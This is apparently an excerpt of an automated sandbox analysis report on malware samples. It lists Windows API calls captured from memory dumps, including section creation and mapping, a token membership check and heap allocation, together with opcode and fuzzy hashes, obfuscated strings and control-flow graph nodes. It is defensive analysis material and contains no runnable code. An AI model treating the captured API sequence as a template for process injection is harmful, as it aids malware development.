                                                • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0046A00F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, Offset: 00467000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_467000_ajjwvsd.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction ID: f1e9479aa311fb76d2b2858f509a69ac9318a541669ec6b33becbc46499daf57
                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                • Instruction Fuzzy Hash: A7113F79A00208EFDB01DF98C985E99BBF5EF08350F058095F948AB362E375EA50DF95
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401966
                                                  • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                  • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                  • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409127107.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F
                                                APIs
                                                • LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: AllocLocal
                                                • String ID:
                                                • API String ID: 3494564517-0
                                                • Opcode ID: 602eef168cce5af4168a3244577f4c42e97a633be8229eb3d624b100d67a8e05
                                                • Instruction ID: 28fb293936c19f60ac03ee1532b02050230a0125afef6b60046f9351569db605
                                                • Opcode Fuzzy Hash: 602eef168cce5af4168a3244577f4c42e97a633be8229eb3d624b100d67a8e05
                                                • Instruction Fuzzy Hash: 8CB012702421008BCB908F50EE047003E60AB08302F438034E204812B0DB700C119B19
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00417B7B
                                                • Sleep.KERNEL32(00000000), ref: 00417BAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterSleepUnhandled
                                                • String ID: -
                                                • API String ID: 2853467449-2547889144
                                                • Opcode ID: 20074c0cef41aae7a696b8d8c8af3f142c4ab85b5304221058387457ac50a666
                                                • Instruction ID: 1948eef14a266f42f26bae57ff7e43f9be2a9bb65bdfdabf3144fb3dff7a339f
                                                • Opcode Fuzzy Hash: 20074c0cef41aae7a696b8d8c8af3f142c4ab85b5304221058387457ac50a666
                                                • Instruction Fuzzy Hash: FB018F31408218BB8B11DF16EC858EE7B78EB89779B11C16DEC149A110C738AE42DF69
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00429FD0), ref: 00417AB6
                                                • GetProcAddress.KERNEL32(00000000,0041C258), ref: 00417AF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2409153065.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_40b000_ajjwvsd.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID:
                                                • API String ID: 1646373207-3916222277
                                                • Opcode ID: 5319113c76b06308bf8541d769fd3ad63d1ecba144e285bf0cc76c909ccebf89
                                                • Instruction ID: 94e7802bf3509c972a7c99209e15cc35b9a207eae9f1f7606aeea9668401f719
                                                • Opcode Fuzzy Hash: 5319113c76b06308bf8541d769fd3ad63d1ecba144e285bf0cc76c909ccebf89
                                                • Instruction Fuzzy Hash: 68318F25A9C3C0DAE351C7E4BD45BE23B619B55B04F1580AAD984CB2F1D3FA0945C37E

                                                Execution Graph

                                                Execution Coverage:1.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:23.4%
                                                Total number of Nodes:124
                                                Total number of Limit Nodes:22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
                                                • API String ID: 0-1998008778
                                                • Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                • Instruction ID: 6b355c572a4c7d603df944ccb62845f1f8bc54a29c8d72dfa5609e92a1bb8649
                                                • Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                • Instruction Fuzzy Hash: 1683DA62E096C28BFB786B3498A47FD6791EF44B48FE0443BCF5E4ABD4CE2855808751

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • AllocateAndInitializeSid.KERNELBASE ref: 00007FF7D50DF3E6
                                                • CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF7D507B07B), ref: 00007FF7D50DF442
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AllocateCheckInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 1663163955-0
                                                • Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                • Instruction ID: db09a6242a81c5b913b0e56279749ccac36cb96ba976643d71be4e1f6de56bc7
                                                • Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                • Instruction Fuzzy Hash: 8B31B57250C74197E6348B25F46437EA7A0FB85B40F94403AEE8D46F98EF3CD4488B00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gFW$gFW$gFW$dT$dT$dT
                                                • API String ID: 0-1908915228
                                                • Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                • Instruction ID: b01aae0de5bff4c73b192edf5b9ef17eb6560e8196513c93e41d5dfe2413deaf
                                                • Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                • Instruction Fuzzy Hash: 1042A132B0CBC986DA749765F5507AEA6A1E7C9B91FA08137CECD07BA4CE3CD4409B50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
                                                • API String ID: 0-2770720463
                                                • Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                • Instruction ID: 368032f7fdd89092e005f8cee4aca725bc776f3245d44902ea8a9d3851159d46
                                                • Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                • Instruction Fuzzy Hash: 9AB19526A2D74597ED745629A0903FEE294EB46FD0FE00437ED8DC7794CE2DE8808752

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %<L,$%<L,$-YV$-YV$-YV
                                                • API String ID: 0-1602977039
                                                • Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                • Instruction ID: defbacf5fbdc3a7322f581daa97976d92c82a94c53b9fb3b42923ef5b5f299ff
                                                • Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                • Instruction Fuzzy Hash: 52D12E22A14B5986FB605B79D4812BDA3B0FF09B48FA88533EE4DD3B54DF38D5818351

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: +I}$+I}
                                                • API String ID: 0-3898140586
                                                • Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                • Instruction ID: f0bb628a7cc22a29801c4c411d82ee898b3bd94b26bcdf8e4808f0c5d4965805
                                                • Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                • Instruction Fuzzy Hash: AD811936E1C1098BEAB4A63865C013DE6909B85B60FF41937ED1ED77E1CE2DE8404B21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .4[$ .4[
                                                • API String ID: 0-1397926279
                                                • Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                • Instruction ID: 5275879db08ce1f6cf03b5325153e33e3c3eb33b130a2e9a5a093d6952aa63fb
                                                • Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                • Instruction Fuzzy Hash: FB51CB12A1AB8886E9115B39A4413A9E3A0BF99B94F944332FD8D53771EF3CE5C18701

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: H]c
                                                • API String ID: 1029625771-2876529112
                                                • Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                • Instruction ID: 2671df4661ee77bed67db6079feb9f35cc2cdfebf795297eba09a93d8d87eb67
                                                • Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                • Instruction Fuzzy Hash: 9E51983160D68682DE74B664E4947BEA790EB84B60FD40A33EEADC77D4CE3CD4408755

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: phV
                                                • API String ID: 0-1350728776
                                                • Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                • Instruction ID: 1bd76665df91f867cc74fd4ecbd17a4950490e344880b4a8645d475a5cf20940
                                                • Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                • Instruction Fuzzy Hash: A441C821A0C54383EA70152994C137D9590AB56B74FE80B33DEBDC7BD5CE6DD8E05351

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                • Instruction ID: 71ba638a93ce9081f123d5ed17a200e95b224c779db956b3afc945d1a9f82088
                                                • Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                • Instruction Fuzzy Hash: 4CC1C726B0CA5587E6685A38A49013DA790DF54B50FF4413BEDEF87F98CE6CE8404B21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                • Instruction ID: 2767647e51cf73a9ceca9276ac054d6a1ca4e8f8d11d60aeb2e407b8053cabe6
                                                • Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                • Instruction Fuzzy Hash: 2711862591CB4983DA606F25B88113EE391FB89BA4FE00933EDCDC7364CE2CD5504B10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1731 7ff7d50e13d0-7ff7d50e13ea 1732 7ff7d50e141d-7ff7d50e1423 1731->1732 1733 7ff7d50e1425-7ff7d50e142b 1732->1733 1734 7ff7d50e13f0-7ff7d50e1418 IsDlgButtonChecked 1732->1734 1733->1732 1735 7ff7d50e142d-7ff7d50e144a 1733->1735 1734->1732
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: ButtonChecked
                                                • String ID:
                                                • API String ID: 1719414920-0
                                                • Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                • Instruction ID: 367af0bd229ec59fa16e7276f7139b2f22617899cf24df98d0d00ad17a723786
                                                • Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                • Instruction Fuzzy Hash: 9DF0C267B0D28045EA346635F54027E9A609B9DFF4FA80476ED8D47BA8CA1DC6818700

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1736 7ff7d50e5750-7ff7d50e5789 1737 7ff7d50e57ac-7ff7d50e57b2 1736->1737 1738 7ff7d50e57b4-7ff7d50e57ba 1737->1738 1739 7ff7d50e5790-7ff7d50e57a7 RtlAllocateHeap 1737->1739 1738->1737 1740 7ff7d50e57bc-7ff7d50e57ca 1738->1740 1739->1737
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                • Instruction ID: 1052ebfec99ff8e912bf548af618242531184f4d95a1f1284d522c7346e92ba0
                                                • Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                • Instruction Fuzzy Hash: 8AF01225629B48C6DA989B15F8D026DB768F7C8B90F901426FE8E83B68DF3DC4604710

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1741 7ff7d50e5620-7ff7d50e564b 1742 7ff7d50e5666-7ff7d50e566b 1741->1742 1743 7ff7d50e5650-7ff7d50e5661 RtlDeleteBoundaryDescriptor 1742->1743 1744 7ff7d50e566d-7ff7d50e5672 1742->1744 1743->1742 1744->1742 1745 7ff7d50e5674-7ff7d50e5679 1744->1745
                                                APIs
                                                • RtlDeleteBoundaryDescriptor.NTDLL(1063196CE2D18368,00007FF7D507B179), ref: 00007FF7D50E565F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: BoundaryDeleteDescriptor
                                                • String ID:
                                                • API String ID: 3203483114-0
                                                • Opcode ID: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
                                                • Instruction ID: bef7713afd72aa4e5b16621f55125d186c929ad285863813435fb909fcb6ca8f
                                                • Opcode Fuzzy Hash: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
                                                • Instruction Fuzzy Hash: 73E0E521A0CB49C6DA60972AF44012DA391B78DF90FA84632DD8C83334DE2CC2824A00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1746 7ff7d50e5c40-7ff7d50e5c5f 1747 7ff7d50e5c8f-7ff7d50e5c95 1746->1747 1748 7ff7d50e5c70-7ff7d50e5c8a RtlAllocateHeap 1747->1748 1749 7ff7d50e5c97-7ff7d50e5c9d 1747->1749 1748->1747 1749->1747 1750 7ff7d50e5c9f-7ff7d50e5cad 1749->1750
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                • Instruction ID: 60a199f6b18ed4f0952efab86d31946b044336f427acbcb31764c685af54f034
                                                • Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                • Instruction Fuzzy Hash: 12F03025619B448ADA789715E8E023DA7A6EB8CB44FD00567EE4E53768CE3CD4518A10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
